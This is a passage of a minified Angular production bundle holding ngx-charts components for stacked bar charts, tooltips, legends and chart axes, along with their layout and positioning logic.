wDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,xDe,1,22,"g",1),u()),2&t){const e=B();C(1),V("ngForOf",e.bars)("ngForTrackBy",e.trackBy)}}function IDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("select",function(n){return be(e),Me(B(2).onClick(n))})("activate",function(n){return be(e),Me(B(2).activate.emit(n))})("deactivate",function(n){return be(e),Me(B(2).deactivate.emit(n))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("width",e.width)("height",e.height)("x",e.x)("y",e.y)("fill",e.color)("stops",e.gradientStops)("data",e.data)("orientation",i.barOrientation.Vertical)("roundEdges",e.roundEdges)("gradient",i.gradient)("ariaLabel",e.ariaLabel)("isActive",i.isActive(e.data))("tooltipDisabled",i.tooltipDisabled)("tooltipPlacement",i.tooltipPlacement)("tooltipType",i.tooltipType)("tooltipTitle",i.tooltipTemplate?void 0:e.tooltipText)("tooltipTemplate",i.tooltipTemplate)("tooltipContext",e.data)("noBarWhenZero",i.noBarWhenZero)("animations",i.animations)}}function RDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,IDe,1,20,"g",1),u()),2&t){const e=B();C(1),V("ngForOf",e.bars)("ngForTrackBy",e.trackBy)}}function SDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",4),he("dimensionsChanged",function(n){const c=be(e).index;return Me(B(2).dataLabelHeightChanged.emit({size:n,index:c}))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("barX",e.x)("barY",e.y)("barWidth",e.width)("barHeight",e.height)("value",e.total)("valueFormatting",i.dataLabelFormatting)("orientation",i.barOrientation.Vertical)}}function kDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,SDe,1,7,"g",3),u()),2&t){const e=B();C(1),V("ngForOf",e.barsForDataLabels)("ngForTrackBy",e.trackDataLabelBy)}}function zDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",5),he("dimensionsChanged",function(n){return be(e),Me(B().updateXAxisHeight(n))}),u()}if(2&t){const e=B();V("xScale",e.xScale)("dims",e.dims)("showLabel",e.showXAxisLabel)("labelText",e.xAxisLabel)("trimTicks",e.trimXAxisTicks)("rotateTicks",e.rotateXAxisTicks)("maxTickLength",e.maxXAxisTickLength)("tickFormatting",e.xAxisTickFormatting)("ticks",e.xAxisTicks)("xAxisOffset",e.dataLabelMaxHeight.negative)}}function WDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",6),he("dimensionsChanged",function(n){return be(e),Me(B().updateYAxisWidth(n))}),u()}if(2&t){const e=B();V("yScale",e.yScale)("dims",e.dims)("showGridLines",e.showGridLines)("showLabel",e.showYAxisLabel)("labelText",e.yAxisLabel)("trimTicks",e.trimYAxisTicks)("maxTickLength",e.maxYAxisTickLength)("tickFormatting",e.yAxisTickFormatting)("ticks",e.yAxisTicks)}}function FDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g")(1,"g",8),he("select",function(n){const c=be(e).$implicit;return Me(B(2).onClick(n,c))})("activate",function(n){const c=be(e).$implicit;return Me(B(2).onActivate(n,c))})("deactivate",function(n){const c=be(e).$implicit;return Me(B(2).onDeactivate(n,c))})("dataLabelHeightChanged",function(n){const c=be(e).index;return Me(B(2).onDataLabelMaxHeightChanged(n,c))}),u()()}if(2&t){const e=a.$implicit,i=B(2);V("@animationState","active"),Rt("transform",i.groupTransform(e)),C(1),V("type",i.barChartType.Stacked)("xScale",i.xScale)("yScale",i.yScale)("activeEntries",i.activeEntries)("colors",i.colors)("series",e.series)("dims",i.dims)("gradient",i.gradient)("tooltipDisabled",i.tooltipDisabled)("tooltipTemplate",i.tooltipTemplate)("showDataLabel",i.showDataLabel)("dataLabelFormatting",i.dataLabelFormatting)("seriesName",e.name)("animations",i.animations)("noBarWhenZero",i.noBarWhenZero)}}function VDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,FDe,2,17,"g",7),u()),2&t){const e=B();C(1),V("ngForOf",e.results)("ngForTrackBy",e.trackBy)}}function BDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g")(1,"g",8),he("select",function(n){const c=be(e).$implicit;return Me(B(2).onClick(n,c))})("activate",function(n){const c=be(e).$implicit;return Me(B(2).onActivate(n,c))})("deactivate",function(n){const c=be(e).$implicit;return Me(B(2).onDeactivate(n,c))})("dataLabelHeightChanged",function(n){const c=be(e).index;return Me(B(2).onDataLabelMaxHeightChanged(n,c))}),u()()}if(2&t){const e=a.$implicit,i=B(2);Rt("transform",i.groupTransform(e)),C(1),V("type",i.barChartType.Stacked)("xScale",i.xScale)("yScale",i.yScale)("activeEntries",i.activeEntries)("colors",i.colors)("series",e.series)("dims",i.dims)("gradient",i.gradient)("tooltipDisabled",i.tooltipDisabled)("tooltipTemplate",i.tooltipTemplate)("showDataLabel",i.showDataLabel)("dataLabelFormatting",i.dataLabelFormatting)("seriesName",e.name)("animations",i.animations)("noBarWhenZero",i.noBarWhenZero)}}function HDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,BDe,2,16,"g",7),u()),2&t){const e=B();C(1),V("ngForOf",e.results)("ngForTrackBy",e.trackBy)}}function d6e(t,a,e){e=e||{};let i,n,r,c=null,d=0;function T(){d=!1===e.leading?0:+new Date,c=null,r=t.apply(i,n)}return function(){const k=+new Date;!d&&!1===e.leading&&(d=k);const q=a-(k-d);return i=this,n=arguments,q<=0?(clearTimeout(c),c=null,d=k,r=t.apply(i,n)):!c&&!1!==e.trailing&&(c=setTimeout(T,q)),r}}function m6e(t,a){return function(i,n,r){return{configurable:!0,enumerable:r.enumerable,get:function(){return Object.defineProperty(this,n,{configurable:!0,enumerable:r.enumerable,value:d6e(r.value,t,a)}),this[n]}}}}var kn=(()=>{return(t=kn||(kn={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",t.Center="center",kn;var t})();function oq(t,a,e){return e===kn.Top?t.top-7:e===kn.Bottom?t.top+t.height-a.height+7:e===kn.Center?t.top+t.height/2-a.height/2:void 0}function rq(t,a,e){return e===kn.Left?t.left-7:e===kn.Right?t.left+t.width-a.width+7:e===kn.Center?t.left+t.width/2-a.width/2:void 0}class Kl{static calculateVerticalAlignment(a,e,i){let n=oq(a,e,i);return n+e.height>window.innerHeight&&(n=window.innerHeight-e.height),n}static calculateVerticalCaret(a,e,i,n){let r;n===kn.Top&&(r=a.height/2-i.height/2+7),n===kn.Bottom&&(r=e.height-a.height/2-i.height/2-7),n===kn.Center&&(r=e.height/2-i.height/2);const c=oq(a,e,n);return c+e.height>window.innerHeight&&(r+=c+e.height-window.innerHeight),r}static calculateHorizontalAlignment(a,e,i){let n=rq(a,e,i);return n+e.width>window.innerWidth&&(n=window.innerWidth-e.width),n}static calculateHorizontalCaret(a,e,i,n){let r;n===kn.Left&&(r=a.width/2-i.width/2+7),n===kn.Right&&(r=e.width-a.width/2-i.width/2-7),n===kn.Center&&(r=e.width/2-i.width/2);const c=rq(a,e,n);return c+e.width>window.innerWidth&&(r+=c+e.width-window.innerWidth),r}static shouldFlip(a,e,i,n){let r=!1;return i===kn.Right&&a.left+a.width+e.width+n>window.innerWidth&&(r=!0),i===kn.Left&&a.left-e.width-n<0&&(r=!0),i===kn.Top&&a.top-e.height-n<0&&(r=!0),i===kn.Bottom&&a.top+a.height+e.height+n>window.innerHeight&&(r=!0),r}static positionCaret(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=-7,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Left?(d=e.width,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Top?(c=e.height,d=Kl.calculateHorizontalCaret(i,e,n,r)):a===kn.Bottom&&(c=-7,d=Kl.calculateHorizontalCaret(i,e,n,r)),{top:c,left:d}}static positionContent(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=i.left+i.width+n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Left?(d=i.left-e.width-n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Top?(c=i.top-e.height-n,d=Kl.calculateHorizontalAlignment(i,e,r)):a===kn.Bottom&&(c=i.top+i.height+n,d=Kl.calculateHorizontalAlignment(i,e,r)),{top:c,left:d}}static determinePlacement(a,e,i,n){if(Kl.shouldFlip(i,e,a,n)){if(a===kn.Right)return kn.Left;if(a===kn.Left)return kn.Right;if(a===kn.Top)return kn.Bottom;if(a===kn.Bottom)return kn.Top}return a}}let u6e=(()=>{class t{constructor(e,i,n){this.element=e,this.renderer=i,this.platformId=n}get cssClasses(){let e="ngx-charts-tooltip-content";return e+=` position-${this.placement}`,e+=` type-${this.type}`,e+=` ${this.cssClass}`,e}ngAfterViewInit(){setTimeout(this.position.bind(this))}position(){if(!ng(this.platformId))return;const e=this.element.nativeElement,i=this.host.nativeElement.getBoundingClientRect();if(!i.height&&!i.width)return;const n=e.getBoundingClientRect();this.checkFlip(i,n),this.positionContent(e,i,n),this.showCaret&&this.positionCaret(i,n),setTimeout(()=>this.renderer.addClass(e,"animate"),1)}positionContent(e,i,n){const{top:r,left:c}=Kl.positionContent(this.placement,n,i,this.spacing,this.alignment);this.renderer.setStyle(e,"top",`${r}px`),this.renderer.setStyle(e,"left",`${c}px`)}positionCaret(e,i){const n=this.caretElm.nativeElement,r=n.getBoundingClientRect(),{top:c,left:d}=Kl.positionCaret(this.placement,i,e,r,this.alignment);this.renderer.setStyle(n,"top",`${c}px`),this.renderer.setStyle(n,"left",`${d}px`)}checkFlip(e,i){this.placement=Kl.determinePlacement(this.placement,i,e,this.spacing)}onWindowResize(){this.position()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-tooltip-content"]],viewQuery:function(e,i){if(1&e&&Mi(nEe,5),2&e){let n;Vt(n=Bt())&&(i.caretElm=n.first)}},hostVars:2,hostBindings:function(e,i){1&e&&he("resize",function(){return i.onWindowResize()},0,zC),2&e&&_D(i.cssClasses)},inputs:{host:"host",showCaret:"showCaret",type:"type",placement:"placement",alignment:"alignment",spacing:"spacing",cssClass:"cssClass",title:"title",template:"template",context:"context"},decls:6,vars:6,consts:[[3,"hidden"],["caretElm",""],[1,"tooltip-content"],[4,"ngIf"],[3,"innerHTML",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div"),it(1,"span",0,1),m(3,"div",2),ne(4,sEe,2,4,"span",3),ne(5,cEe,1,1,"span",4),u()()),2&e&&(C(1),Dv("tooltip-caret position-",i.placement,""),V("hidden",!i.showCaret),C(3),V("ngIf",!i.title),C(1),V("ngIf",i.title))},dependencies:[Ri,_1],styles:[".ngx-charts-tooltip-content{position:fixed;border-radius:3px;z-index:5000;display:block;font-weight:400;opacity:0;pointer-events:none!important}.ngx-charts-tooltip-content.type-popover{background:#fff;color:#060709;border:1px solid #72809b;box-shadow:0 1px 3px #0003,0 1px 1px #00000024,0 2px 1px -1px #0000001f;font-size:13px;padding:4px}.ngx-charts-tooltip-content.type-popover .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid #fff}.ngx-charts-tooltip-content.type-tooltip{color:#fff;background:rgba(0,0,0,.75);font-size:12px;padding:0 10px;text-align:center;pointer-events:auto}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content .tooltip-label{display:block;line-height:1em;padding:8px 5px 5px;font-size:1em}.ngx-charts-tooltip-content .tooltip-val{display:block;font-size:1.3em;line-height:1em;padding:0 5px 8px}.ngx-charts-tooltip-content .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.position-right{transform:translate(10px)}.ngx-charts-tooltip-content.position-left{transform:translate(-10px)}.ngx-charts-tooltip-content.position-top{transform:translateY(-10px)}.ngx-charts-tooltip-content.position-bottom{transform:translateY(10px)}.ngx-charts-tooltip-content.animate{opacity:1;transition:opacity .3s,transform .3s;transform:translate(0);pointer-events:auto}.area-tooltip-container{padding:5px 0;pointer-events:none}.tooltip-item{text-align:left;line-height:1.2em;padding:5px 0}.tooltip-item .tooltip-item-color{display:inline-block;height:12px;width:12px;margin-right:5px;color:#5b646b;border-radius:3px}\n"],encapsulation:2}),function Ve(t,a,e,i){var c,n=arguments.length,r=n<3?a:null===i?i=Object.getOwnPropertyDescriptor(a,e):i;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)r=Reflect.decorate(t,a,e,i);else for(var d=t.length-1;d>=0;d--)(c=t[d])&&(r=(n<3?c(r):n>3?c(a,e,r):c(a,e))||r);n>3&&r&&Object.defineProperty(a,e,r)}([m6e(100)],t.prototype,"onWindowResize",null),t})(),sq=(()=>{class t{constructor(e,i,n){this.applicationRef=e,this.componentFactoryResolver=i,this.injector=n}static setGlobalRootViewContainer(e){t.globalRootViewContainer=e}getRootViewContainer(){if(this._container)return this._container;if(t.globalRootViewContainer)return t.globalRootViewContainer;if(this.applicationRef.components.length)return this.applicationRef.components[0];throw new Error("View Container not found! ngUpgrade needs to manually set this via setRootViewContainer or setGlobalRootViewContainer.")}setRootViewContainer(e){this._container=e}getComponentRootNode(e){return function f6e(t){return t.element}(e)?e.element.nativeElement:e.hostView&&e.hostView.rootNodes.length>0?e.hostView.rootNodes[0]:e.location.nativeElement}getRootViewContainerNode(e){return this.getComponentRootNode(e)}projectComponentBindings(e,i){if(i){if(void 0!==i.inputs){const n=Object.getOwnPropertyNames(i.inputs);for(const r of n)e.instance[r]=i.inputs[r]}if(void 0!==i.outputs){const n=Object.getOwnPropertyNames(i.outputs);for(const r of n)e.instance[r]=i.outputs[r]}}return e}appendComponent(e,i={},n){n||(n=this.getRootViewContainer());const r=this.getComponentRootNode(n),c=new Zw(r,this.componentFactoryResolver,this.applicationRef,this.injector),d=new fp(e),T=c.attach(d);return this.projectComponentBindings(T,i),T}}return t.globalRootViewContainer=null,t.\u0275fac=function(e){return new(e||t)(At(Jf),At(On),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),GI=(()=>{class t extends class h6e{constructor(a){this.injectionService=a,this.defaults={},this.components=new Map}getByType(a=this.type){return this.components.get(a)}create(a){return this.createByType(this.type,a)}createByType(a,e){e=this.assignDefaults(e);const i=this.injectComponent(a,e);return this.register(a,i),i}destroy(a){const e=this.components.get(a.componentType);if(e&&e.length){const i=e.indexOf(a);i>-1&&(e[i].destroy(),e.splice(i,1))}}destroyAll(){this.destroyByType(this.type)}destroyByType(a){const e=this.components.get(a);if(e&&e.length){let i=e.length-1;for(;i>=0;)this.destroy(e[i--])}}injectComponent(a,e){return this.injectionService.appendComponent(a,e)}assignDefaults(a){const e=Object.assign({},this.defaults.inputs),i=Object.assign({},this.defaults.outputs);return!a.inputs&&!a.outputs&&(a={inputs:a}),e&&(a.inputs=Object.assign(Object.assign({},e),a.inputs)),i&&(a.outputs=Object.assign(Object.assign({},i),a.outputs)),a}register(a,e){this.components.has(a)||this.components.set(a,[]),this.components.get(a).push(e)}}{constructor(e){super(e),this.type=u6e}}return t.\u0275fac=function(e){return new(e||t)(At(sq))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Su=(()=>{return(t=Su||(Su={})).Right="right",t.Below="below",Su;var t})(),Og=(()=>{return(t=Og||(Og={})).ScaleLegend="scaleLegend",t.Legend="legend",Og;var t})(),Wa=(()=>{return(t=Wa||(Wa={})).Time="time",t.Linear="linear",t.Ordinal="ordinal",t.Quantile="quantile",Wa;var t})();let cq=(()=>{class t{constructor(){this.horizontal=!1}ngOnChanges(e){const i=this.gradientString(this.colors.range(),this.colors.domain());this.gradient=`linear-gradient(to ${this.horizontal?"right":"bottom"}, ${i})`}gradientString(e,i){i.push(1);const n=[];return e.reverse().forEach((r,c)=>{n.push(`${r} ${Math.round(100*i[c])}%`)}),n.join(", ")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-scale-legend"]],inputs:{valueRange:"valueRange",colors:"colors",height:"height",width:"width",horizontal:"horizontal"},features:[sa],decls:8,vars:10,consts:[[1,"scale-legend"],[1,"scale-legend-label"],[1,"scale-legend-wrap"]],template:function(e,i){1&e&&(m(0,"div",0)(1,"div",1)(2,"span"),s(3),u()(),it(4,"div",2),m(5,"div",1)(6,"span"),s(7),u()()()),2&e&&(ri("height",i.horizontal?void 0:i.height,"px")("width",i.width,"px"),Ct("horizontal-legend",i.horizontal),C(3),ke(i.valueRange[1].toLocaleString()),C(1),ri("background",i.gradient),C(3),ke(i.valueRange[0].toLocaleString()))},styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .scale-legend{text-align:center;display:flex;flex-direction:column}.chart-legend .scale-legend-wrap{display:inline-block;flex:1;width:30px;border-radius:5px;margin:0 auto}.chart-legend .scale-legend-label{font-size:12px}.chart-legend .horizontal-legend.scale-legend{flex-direction:row}.chart-legend .horizontal-legend .scale-legend-wrap{width:auto;height:30px;margin:0 16px}\n"],encapsulation:2,changeDetection:0}),t})();function Ub(t){return t instanceof Date?t.toLocaleDateString():t.toLocaleString()}let lq=(()=>{class t{constructor(){this.isActive=!1,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.toggle=new Tt}get trimmedLabel(){return this.formattedLabel||"(empty)"}onMouseEnter(){this.activate.emit({name:this.label})}onMouseLeave(){this.deactivate.emit({name:this.label})}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend-entry"]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{color:"color",label:"label",formattedLabel:"formattedLabel",isActive:"isActive"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",toggle:"toggle"},decls:4,vars:6,consts:[["tabindex","-1",3,"title","click"],[1,"legend-label-color",3,"click"],[1,"legend-label-text"]],template:function(e,i){1&e&&(m(0,"span",0),he("click",function(){return i.select.emit(i.formattedLabel)}),m(1,"span",1),he("click",function(){return i.toggle.emit(i.formattedLabel)}),u(),m(2,"span",2),s(3),u()()),2&e&&(Ct("active",i.isActive),V("title",i.formattedLabel),C(1),ri("background-color",i.color),C(2),ct(" ",i.trimmedLabel," "))},encapsulation:2,changeDetection:0}),t})(),dq=(()=>{class t{constructor(e){this.cd=e,this.horizontal=!1,this.labelClick=new Tt,this.labelActivate=new Tt,this.labelDeactivate=new Tt,this.legendEntries=[]}ngOnChanges(e){this.update()}update(){this.cd.markForCheck(),this.legendEntries=this.getLegendEntries()}getLegendEntries(){const e=[];for(const i of this.data){const n=Ub(i);-1===e.findIndex(c=>c.label===n)&&e.push({label:i,formattedLabel:n,color:this.colors.getColor(i)})}return e}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.label===n.name)}activate(e){this.labelActivate.emit(e)}deactivate(e){this.labelDeactivate.emit(e)}trackBy(e,i){return i.label}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend"]],inputs:{data:"data",title:"title",colors:"colors",height:"height",width:"width",activeEntries:"activeEntries",horizontal:"horizontal"},outputs:{labelClick:"labelClick",labelActivate:"labelActivate",labelDeactivate:"labelDeactivate"},features:[sa],decls:5,vars:9,consts:[["class","legend-title",4,"ngIf"],[1,"legend-wrap"],[1,"legend-labels"],["class","legend-label",4,"ngFor","ngForOf","ngForTrackBy"],[1,"legend-title"],[1,"legend-title-text"],[1,"legend-label"],[3,"label","formattedLabel","color","isActive","select","activate","deactivate"]],template:function(e,i){1&e&&(m(0,"div"),ne(1,lEe,3,1,"header",0),m(2,"div",1)(3,"ul",2),ne(4,dEe,2,4,"li",3),u()()()),2&e&&(ri("width",i.width,"px"),C(1),V("ngIf",(null==i.title?null:i.title.length)>0),C(2),ri("max-height",i.height-45,"px"),Ct("horizontal-legend",i.horizontal),C(1),V("ngForOf",i.legendEntries)("ngForTrackBy",i.trackBy))},dependencies:[lq,Ri,Zi],styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .legend-title{white-space:nowrap;overflow:hidden;margin-left:10px;margin-bottom:5px;font-size:14px;font-weight:700}.chart-legend ul,.chart-legend li{padding:0;margin:0;list-style:none}.chart-legend .horizontal-legend li{display:inline-block}.chart-legend .legend-wrap{width:calc(100% - 10px)}.chart-legend .legend-labels{line-height:85%;list-style:none;text-align:left;float:left;width:100%;border-radius:3px;overflow-y:auto;overflow-x:hidden;white-space:nowrap;background:rgba(0,0,0,.05)}.chart-legend .legend-label{cursor:pointer;font-size:90%;margin:8px;color:#afb7c8}.chart-legend .legend-label:hover{color:#000;transition:.2s}.chart-legend .legend-label .active .legend-label-text{color:#000}.chart-legend .legend-label-color{display:inline-block;height:15px;width:15px;margin-right:5px;color:#5b646b;border-radius:3px}.chart-legend .legend-label-text{display:inline-block;vertical-align:top;line-height:15px;font-size:12px;width:calc(100% - 20px);text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.chart-legend .legend-title-text{vertical-align:bottom;display:inline-block;line-height:16px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}\n"],encapsulation:2,changeDetection:0}),t})(),mq=(()=>{class t{constructor(){this.showLegend=!1,this.animations=!0,this.legendLabelClick=new Tt,this.legendLabelActivate=new Tt,this.legendLabelDeactivate=new Tt,this.LegendPosition=Su,this.LegendType=Og}ngOnChanges(e){this.update()}update(){let e=0;this.showLegend&&(this.legendType=this.getLegendType(),(!this.legendOptions||this.legendOptions.position===Su.Right)&&(e=this.legendType===Og.ScaleLegend?1:2)),this.chartWidth=Math.floor(this.view[0]*(12-e)/12),this.legendWidth=this.legendOptions&&this.legendOptions.position!==Su.Right?this.chartWidth:Math.floor(this.view[0]*e/12)}getLegendType(){return this.legendOptions.scaleType===Wa.Linear?Og.ScaleLegend:Og.Legend}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-chart"]],inputs:{view:"view",showLegend:"showLegend",legendOptions:"legendOptions",legendType:"legendType",activeEntries:"activeEntries",animations:"animations"},outputs:{legendLabelClick:"legendLabelClick",legendLabelActivate:"legendLabelActivate",legendLabelDeactivate:"legendLabelDeactivate"},features:[ki([GI]),sa],ngContentSelectors:aq,decls:5,vars:6,consts:[[1,"ngx-charts-outer"],[1,"ngx-charts"],["class","chart-legend",3,"horizontal","valueRange","colors","height","width",4,"ngIf"],["class","chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate",4,"ngIf"],[1,"chart-legend",3,"horizontal","valueRange","colors","height","width"],[1,"chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),fi(),m(1,"svg",1),va(2),u(),ne(3,mEe,1,5,"ngx-charts-scale-legend",2),ne(4,uEe,1,7,"ngx-charts-legend",3),u()),2&e&&(ri("width",i.view[0],"px"),C(1),Rt("width",i.chartWidth)("height",i.view[1]),C(2),V("ngIf",i.showLegend&&i.legendType===i.LegendType.ScaleLegend),C(1),V("ngIf",i.showLegend&&i.legendType===i.LegendType.Legend))},dependencies:[cq,dq,Ri],encapsulation:2,changeDetection:0}),t})(),p6e=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.visible=new Tt,this.isVisible=!1,this.runCheck()}destroy(){clearTimeout(this.timeout)}onVisibilityChange(){this.zone.run(()=>{this.isVisible=!0,this.visible.emit(!0)})}runCheck(){const e=()=>{if(!this.element)return;const{offsetHeight:i,offsetWidth:n}=this.element.nativeElement;i&&n?(clearTimeout(this.timeout),this.onVisibilityChange()):(clearTimeout(this.timeout),this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e(),100)}))};this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e())})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["visibility-observer"]],outputs:{visible:"visible"}}),t})();function uq(t){return"[object Date]"===toString.call(t)}let hq=(()=>{class t{constructor(e,i,n,r){this.chartElement=e,this.zone=i,this.cd=n,this.platformId=r,this.scheme="cool",this.schemeType=Wa.Ordinal,this.animations=!0,this.select=new Tt}ngOnInit(){Zv(this.platformId)&&(this.animations=!1)}ngAfterViewInit(){this.bindWindowResizeEvent(),this.visibilityObserver=new p6e(this.chartElement,this.zone),this.visibilityObserver.visible.subscribe(this.update.bind(this))}ngOnDestroy(){this.unbindEvents(),this.visibilityObserver&&(this.visibilityObserver.visible.unsubscribe(),this.visibilityObserver.destroy())}ngOnChanges(e){this.update()}update(){if(this.results=this.results?this.cloneData(this.results):[],this.view)this.width=this.view[0],this.height=this.view[1];else{const e=this.getContainerDims();e&&(this.width=e.width,this.height=e.height)}this.width||(this.width=600),this.height||(this.height=400),this.width=Math.floor(this.width),this.height=Math.floor(this.height),this.cd&&this.cd.markForCheck()}getContainerDims(){let e,i;const n=this.chartElement.nativeElement;if(ng(this.platformId)&&null!==n.parentNode){const r=n.parentNode.getBoundingClientRect();e=r.width,i=r.height}return e&&i?{width:e,height:i}:null}formatDates(){for(let e=0;e<this.results.length;e++){const i=this.results[e];if(i.label=i.name,uq(i.label)&&(i.label=i.label.toLocaleDateString()),i.series)for(let n=0;n<i.series.length;n++){const r=i.series[n];r.label=r.name,uq(r.label)&&(r.label=r.label.toLocaleDateString())}}}unbindEvents(){this.resizeSubscription&&this.resizeSubscription.unsubscribe()}bindWindowResizeEvent(){if(!ng(this.platformId))return;const i=Tc(window,"resize").pipe(dp(200)).subscribe(n=>{this.update(),this.cd&&this.cd.markForCheck()});this.resizeSubscription=i}cloneData(e){const i=[];for(const n of e){const r={name:n.name};if(void 0!==n.value&&(r.value=n.value),void 0!==n.series){r.series=[];for(const c of n.series){const d=Object.assign({},c);r.series.push(d)}}void 0!==n.extra&&(r.extra=JSON.parse(JSON.stringify(n.extra))),i.push(r)}return i}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(Ma),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["base-chart"]],inputs:{results:"results",view:"view",scheme:"scheme",schemeType:"schemeType",customColors:"customColors",animations:"animations"},outputs:{select:"select"},features:[sa],decls:1,vars:0,template:function(e,i){1&e&&it(0,"div")},encapsulation:2}),t})();var Fs=(()=>{return(t=Fs||(Fs={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",Fs;var t})();let fq=(()=>{class t{constructor(e){this.textHeight=25,this.margin=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}update(){switch(this.strokeWidth="0.01",this.textAnchor="middle",this.transform="",this.orient){case Fs.Top:case Fs.Bottom:this.y=this.offset,this.x=this.width/2;break;case Fs.Left:this.y=-(this.offset+this.textHeight+this.margin),this.x=-this.height/2,this.transform="rotate(270)";break;case Fs.Right:this.y=this.offset+this.margin,this.x=-this.height/2,this.transform="rotate(270)"}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-axis-label",""]],inputs:{orient:"orient",label:"label",offset:"offset",width:"width",height:"height"},features:[sa],attrs:hEe,decls:2,vars:6,template:function(e,i){1&e&&(fi(),m(0,"text"),s(1),u()),2&e&&(Rt("stroke-width",i.strokeWidth)("x",i.x)("y",i.y)("text-anchor",i.textAnchor)("transform",i.transform),C(1),ct(" ",i.label," "))},encapsulation:2,changeDetection:0}),t})();function QI(t,a=16){return"string"!=typeof t?"number"==typeof t?t+"":"":(t=t.trim()).length<=a?t:`${t.slice(0,a)}...`}function pq(t,a){if(t.length>a){const e=[],i=Math.floor(t.length/a);for(let n=0;n<t.length;n++)n%i==0&&e.push(t[n]);t=e}return t}var km=(()=>{return(t=km||(km={})).Start="start",t.Middle="middle",t.End="end",km;var t})();let _q=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.rotateTicks=!0,this.dimensionsChanged=new Tt,this.verticalSpacing=20,this.rotateLabels=!1,this.innerTickSize=6,this.outerTickSize=6,this.tickPadding=3,this.textAnchor=km.Middle,this.maxTicksLength=0,this.maxAllowedLength=16,this.height=0,this.approxHeight=10}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ng(this.platformId))return void this.dimensionsChanged.emit({height:this.approxHeight});const 